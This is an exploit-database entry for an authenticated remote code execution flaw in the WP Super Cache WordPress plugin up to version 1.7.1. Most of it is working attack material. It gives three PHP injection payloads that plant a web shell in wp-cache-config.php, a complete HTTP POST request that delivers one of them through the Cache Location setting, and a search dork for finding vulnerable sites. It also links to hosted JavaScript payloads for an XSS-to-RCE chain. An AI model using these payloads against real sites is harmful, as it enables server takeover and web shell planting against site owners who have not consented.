WordPress WP Super Cache 1.7.1 Remote Code Execution

2021-03-29T00:00:00
ID PACKETSTORM:161995
Type packetstorm
Reporter m0ze
Modified 2021-03-29T00:00:00

Description

                                        
                                            `# Exploit Title: WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)  
# Google Dork: inurl:/wp-content/plugins/wp-super-cache/  
# Date: 2021-03-13  
# Exploit Author: m0ze  
# Version: <= 1.7.1  
# Software Link: https://wordpress.org/plugins/wp-super-cache/  
  
  
### -- [ Info: ]  
  
[i] An Authenticated RCE vulnerability was discovered in the WP Super Cache plugin through 1.7.1 for WordPress.  
  
[i] RCE due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection.  
  
[i] Another possible attack vector: from XSS to RCE.  
  
### -- [ Impact: ]  
  
[~] Full compromise of the vulnerable web application and also web server.  
  
### -- [ Payloads: ]  
  
[$] ';system($_GET[13]);include_once \'wp-cache-config.php\';'  
  
[$] ';`$_GET[13]`;include_once \'wp-cache-config.php\';?><!--  
  
[$] ';`$_GET[13]`;#  
  
  
### -- [ PoC #1 | Authenticated RCE | Cache Location: ]  
  
[!] POST /wp-admin/options-general.php?page=wpsupercache&tab=settings  
HTTP/1.1  
Host: example.com  
User-Agent: Mozilla/5.0  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 501  
Cookie: [cookies]  
  
_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fyour%2Fown%2Fpath%2Fexample.com%2Fwp-content%2Fcache%2F%27%3Bsystem%28%24_GET%5B13%5D%29%3Binclude_once+%5C%27wp-cache-config.php%5C%27%3B%27&_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings  
  
  
  
### -- [ PoC #2 | From XSS to RCE | Cache Location: ]  
  
[!] https://m0ze.ru/payload/wp-super-cache-rce.js  
  
[!] https://m0ze.ru/payload/wp-super-cache-rce-j.js  
  
`